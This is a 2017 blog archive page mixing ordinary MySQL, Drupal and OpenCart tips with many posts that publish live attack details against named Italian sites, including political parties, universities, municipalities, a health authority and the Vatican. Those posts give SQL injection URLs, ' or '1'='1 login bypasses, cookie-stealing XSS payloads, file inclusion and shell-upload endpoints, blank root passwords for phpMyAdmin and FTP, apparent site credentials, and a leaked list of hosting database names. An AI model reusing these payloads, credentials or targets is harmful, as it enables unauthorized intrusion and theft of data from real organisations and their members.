Skip to main content

Posts

Showing posts from 2017

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7

How to fix Thread stack overrun with mysql 5.7 (and other versions)
Thread stack overrun with mysql 5.7 on Linux and Windows Run the server with
mysqld --thread_stack=256k
to configure my.ini/my.cnf (server.cnf) add:

thread_stack = 256K


Further problems with mysql on windows On 64 bit (windows) probably you will need to give a bigger value
I've been forced to use
thread_stack = 512K on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL))






Generic errors with mysql_upgrade
ERROR 1436 (HY000) at line 1879: Thread stack overrun
ERROR 1436 (HY000) at line 1935

Use 'mysqld --thread_stack=#' to specify a bigger stack

How to log all the queries in mysql or mariadb - windows and linux

Log all your sql queries on mysql server Note: use only on your Test Server and without a lot of workload or connections othewise you are going to fill all your disk space or the IO resources (and even the CPU load to wait for IO writing).

Make sure that your logs folder exists and use the same folder of other mysql logs (ex. /var/log/mysql/)

Add in your my.ini/my.cnf (or server.cnf)


on Windows:
general_log_file="C:/yourWindowsMysql/logs/logsql.log"
general_log=1
on linux *unix add:
general_log_file="/var/log/mysqld-queries.log"
general_log=1

 restart your mysql or mariadb server



https://www.movimento5stelle.it again | several vulnerabilities, system compromise

Old vulnerabilities and other informations. The main website shares the same problems with http://rousseau.movimento5stelle.it.

NOTE/Disclaimer: if you are supposing to vote in a safe manner (It's less safe than the cheapest italian service provider with an old version of commoly used scripts, like wordpress or joomla, installed by your "cousin") I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are.
The server mostly haven't been updated for years, except for just what they thought was worth updating.
Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites.
No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your respecti…

Reggia di caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it

Joomla 1.5.15 (Vulnerable) http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also have malwares (search in the source code http://www.freepokermoney.net or similar urls):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page:http://archive.is/3JJsi


Wordpress 4.8.3 (with bogus plugin and theme) http://www.reggiadicaserta.beniculturali.it/wp/




the wordpress version is the "new" website and they also "devastated" the, already bad (with malwares), seo optimization by not redirecting urls. I feel very sorry for that. What a mess.



How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32bit version of PHP.
If you want to install drupal on your TEST server even if you have a 32bit version of php

you need to edit:
core/modules/system/system.install
and comment out ( ~line 973):


  if (PHP_INT_SIZE <= 4) {
    $requirements['limited_date_range'] = [
      'title' => t('Limited date range'),
      'value' => t('Your PHP installation has a limited date range.'),
      'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
      'severity' => REQUIREMENT_WARNING,
    ];
  }

It's highly suggested to update to a recent 64bit version of PHP.

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc.
-
http://www.dieti.unina.it
Ubuntu
Joomla 2.5.8

Admin can be changed (admin takeover) even if there's the external login for the users.
php files  can be uploaded via
administrator/components/com_media/helpers/media.php

com_gcalendar  is vulnerable and should be upgraded to dpcalendar.

---

http://www.digita.unina.it/
wordpress 4.8.1
http://www.digita.unina.it/digita/wp-login.php
sds_dj32f
lizzi

---

http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error:http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/

---
XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E

---

SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(ne…

sefsas.it | sql injection

Sql Injection in the email confirmation url (there are several other):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

full query sample in output

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived:http://archive.is/xDVeh
XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>


SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici

archived error:http://archive.is/9bJfo

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple Fix:
if (!defined( 'ABSPATH')) exit; _________
Urls that can give you errors with local folder paths on Wordpress 4.8.3 and previous versions:
/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/customize/class-wp-customize-nav…

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise

Joomla com_fabrik vulnerabilities

raise the error related to sql injection
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----

archived: http://archive.is/1Up6B

Upload vulnerability
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived:http://archive.is/6XtTl

path (leaked from the errors)
/web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore

Manuale Software PT100SV Release A8C6



Qui il download del manuale


Mirror:
filefactory.comhttp://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf
share-online.bizhttp://www.share-online.biz/dl/GRQZM4YOUSV
sendmyway.comhttps://www.sendmyway.com/bgktennfvwqz
gigapeta.comhttp://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it |path disclosure, xss, sql injections, shell upload

http://lesim1.ing.unisannio.it

We can start to detect the version manually (automated tools, like joomscan, are giving random values) from
http://lesim1.ing.unisannio.it/configuration.php-dist
1.5.x
archived:http://archive.is/VB6I3

libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26.
components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23.

(Tip: I just used files and folder comparison with beyond compare, but you can also use Meld on linux)



To get the path we try to raise errors with wrong sql queries. In this case we are abusing of the weblinks component and adding the filter_order even if the site uses SEF urls (who cares).

http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order=

to get an output like this:
No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHERE catid = 53 AND p…

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise

http://www.orientamento.unisannio.it
The website uses phpnuke with some customizations (sometimes it detects that we are trying to abuse of specific bugs)

we can find the path from the Deprecated notices in various modules
/var/www/html/copus/home/copus/modules/

ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25

register_globals seems to be On and the variables can be replaced by using post/get requests.

Supposed version <=PHP-Nuke-6.9 since banners.php exists

In banners.php we have

switch($op) { ... }
sample
http://www.orientamento.unisannio.it/banners.php?op=login

By using, for example, this url:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the sql is executed and we can dump the data instead of the banners

File via sql
http://www.orientamento.unisannio.it/banners.php?op=Ok&login='…

cineca.it | XSS

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca

ex.:
http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca


archived with sample javascript text: http://archive.is/To5A4

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/

Path can be seen in the 404 error pages
D:\inetpub\webs\carminevalentinoit\


XSS

http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1


and we can place any video in the content

Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1


shortened url: https://goo.gl/sWhg1P
archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech is usually sending spam emails.

There's a fake unsubscribe script that reports the removal of anything, even if you add a simple xss.

http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com

____

The mail server can be exploited with an old remote exploit for postfix on debian linux. (shellshock)

hacksannio.it (... other websites) | path disclosure, system compromise

by simply using the theme url
http://www.hacksannio.it/wp-content/themes/betheme/

we can raise an error

Fatal error: Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php on line 10




_______________
Update:
after getting the possibility to execute code it's possible to locally escalate root privileges (expl. openrestinpeace) and local DoS.

There are several other websites on the server:


9plus.it
abgdhs.com
academyhoreca.it
acquagia.com
agropolibooking.it
albertogalantini.com
alcacomunicazione.it
alexandramatveeva.com
alkemicaproject.it
allianceagainstcancer.org
anelli.info
angolodeidesideri.it
antonelladambrosio.com
apicolturavallicupe.com
appcreative.it
arredostil.it
aspveneto.org
avvocatovitali.com
bbqcombi.com
belsiana7central.com
beneventocalcio.it
bestravelsintheworld.com
bevolution-torino.com
bng-…

w2.vatican.va photovat.com | XSS, path disclosure

Simple XSS
http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E

_____________________________________
Adobe experience manager CMS
A proxy is needed to connect since probably they limited the access from a range of IPs
-> Sample working proxy: 5.152.158.4:8080
Admin access: https://w2.vatican.va:4502/admin

SSL verification must be disabled (OCSP on firefox).

Update: it's possible to access
_____________________________________

Other websites
http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true

_____________________________________
 http://www.photovat.com
IIS server
D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact email script.

http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
example:
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html

archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn

archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

the script can be triggered to show errors and the path
Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58    


XSS
There are various xss and stored xss in the profile area.

It's possi…

https://iscriviti.radicali.it | errors, path disclosure, system compromise

https://iscriviti.radicali.it

directly accessing this url we get an error with the paths
https://iscriviti.radicali.it/Landing/RegistraDati

D:\xampp\htdocs\radicali\landing_iscrizione\index.php

They are using windows and xampp that are not the best solution for a production server that should store sensitive data.

The php scripts are using the codeigniter framework.

The archived error page:
http://archive.is/PFw55


Access to phpmyadmin
https://iscriviti.radicali.it/phpmyadmin/

user: root
password: ""


ftp:iscriviti.radicali.it
user: root
password: ""

update: it's not working anymore.

www.leganord.org | various security issues

Vulnerable Phocadownload

Possibility to add different videos from youtube
www.leganord.org/index.php/documenti-politici/68-gianfranco-miglio/8741-quella-rivoluzione-dal-basso?videoid=[youtube video id]

They also got a malware (not from me - a lot of porn stuff)
Google Cache
http://webcache.googleusercontent.com/search?q=cache:r0-Y-VR0oHAJ:www.leganord.org/xIpV58pu_+&cd=11&hl=it&ct=clnk&gl=it

Copy of the cached page:
http://archive.is/7Vhy9


Note: they fixed the problems.

https://margot.partitodemocratico.it - path disclosure, system compromise

There is a path disclosure thanks to an error.
https://margot.partitodemocratico.it/nl/cancellami.php?e=test&secure=test
unsubscribe_v2.php

https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=[anything]&question=[anything]&answer=[anything]&e=[anything]&secure=[anything]&mid=[anything]
(original sample - https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=2&question=2&answer=si&e=ZWxpb3BvbGlAdGlzY2FsaS5pdA&secure=04912b36dcc08f33892266834a963bf0&mid=1eea )

It's possible to have access to the system.


Is it an "honeypot" ... as stated in the path?
It's possible but they didn't fix the bugs and it's possible to access to confidential data.
/repository/GCloud-WebRoot/margot.partitodemocratico.it/pd_margot_honeypot/


http://www.pdcampania.it - content injection, possible admin reset to external MX server

04/09/2017 http://www.pdcampania.it
wordpress 4.2.8

It's possible to inject content and reset the admin password and get the email to an external MX server.

The website is down for restyling but the wordpress scripts are still available to the public.

For example the admin area:
www.pdcampania.it/wp-admin

Content Models html5

Content Models

Metadata: Content that sets up the presentation or behavior of the rest of the content. These elements are found in the head of the document.
Elements:<base>, <link>, <meta>, <noscript>, <script>, <style>, <title>

Embedded: Content that imports other resources into the document.
Elements:<audio>, <video>, <canvas>, <iframe>, <img>, <math>, <object>, <svg>

Interactive: Content specifically intended for user interaction.
Elements:<a>, <audio>, <video>, <button>

Opencart 2.x - save settings for module or add module to layout

//loading the settings
$this->load->model('setting/setting');
$setting = $this->model_setting_setting->getSetting('mymodule');
//saving the settings
$this->load->model('setting/setting');
$setting = $this->model_setting_setting->editSetting('mymodule');

NOTE: in the form the input name="" must start with the name of the module. Example: mymodule_limit, mymodule_status, mymodule_othersetting


//getting data from the module - usually is loaded by the configured layout
        $this->load->model('extension/module');
$setting = $this->model_extension_module->getModuleByCode('mymodule');



//saving data for the module with new id from the POST (saves a new one that can be loaded from the layout)
        $this->load->model('extension/module');
               if (!isset($this->request->get['module_id'])) { // $this->model_extension_module->addModule('mymodule', $t…

https://www.aslbenevento1.it/ | SQL Injection.

https://www.aslbenevento1.it/cupweb/
Ver. 20.11.00_003 28/04/17

a' or '1'='1
in username and password to access as
SGPWeb Operatore
if we raise an error

errore di accesso al Data Base: ORA-01756: quoted string not properly terminated : SELECT password,description,user_code,connectingdate,users.sco_id from




http://www.beppegrillo.it https://rousseau.movimento5stelle.it | sql injection system compromise

A simple sql injection is needed to login with *any* user
example: ' or '1'='1.

https://rousseau.movimento5stelle.it/login.php


Sql injection where sharing_id is a table in the group by clause.
https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli]

http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli]

sample for the voting system: voting_votazioni voting_votazioni_vote


The main website also uses movable type 4 with vulnerabilities.



Sample cols
author_federated_id | author_federated_video                                                    | author_federated_comune_id | author_federated_candidato | author_federated_regione_id | author_federated_profile_id | author_federated_external_id | author_federated_provincia_id | author_federated_userpic_asset_id | author_federated_candidato_europa | author_federated_candidato_comune | author_federated_circoscrizione_id | author_federated_candidato_regione | author_federate…

one.com webcluster-ssl2.webpod5-cph3.one.com | mysql database and data dump.

webcluster-ssl2.webpod5-cph3.one.com

036reklam_se
050_fotografie_nl
10000records_co
1126_se
12aug2006_dk
1555_dk
1come_se
1ehulpwinkel_nl
1plus_se
21800643_dk
224food_com
24pharmusa7_com
2554526
2554694
2555169
2ctrl_se
2ctrl_se_db_2ctrlse
2hc_be
2morrowpeople_c
3000gtcc_se
3danatomia_com
3danatomia_com_oppgaver
3danatomia_com_service
3telesales_dk
4dlaserproducti
50off_se
58webtv_com
5bc_dk
5o1st_be
5snickare_se
7colourbridge_n
7light_eu
81mrx_se
_mysql_housekeeping
a2be_dk
a_steel_be
aabneatelilrdoe
aahlander_se
aahus_dk
aaparken8_dk
aasm_no
aaultrasonics_com
ab_coaching_dk
ab_leg_dk
abacrombie_se
abc_literature_
abogadosrapidos
abytorpsamatort
acamarina_com
accademiabasket
accademiabasket_it_new_wp
accademiabasket_it_wp
acceler8_be
acceptanceandco
ackerstedt_se
acomodeo_com
actierp_se
actiwave_se
acvn_nl
adamas_dk
adamguest_com
adamseidel_co_u
adding_sights_eu
addoit_se
addquaregnon_be
adelina_se
adessofuoridaic
adffinity_com
adhocdesign_dk
admihistratieka
advanceit_no
adventuresba…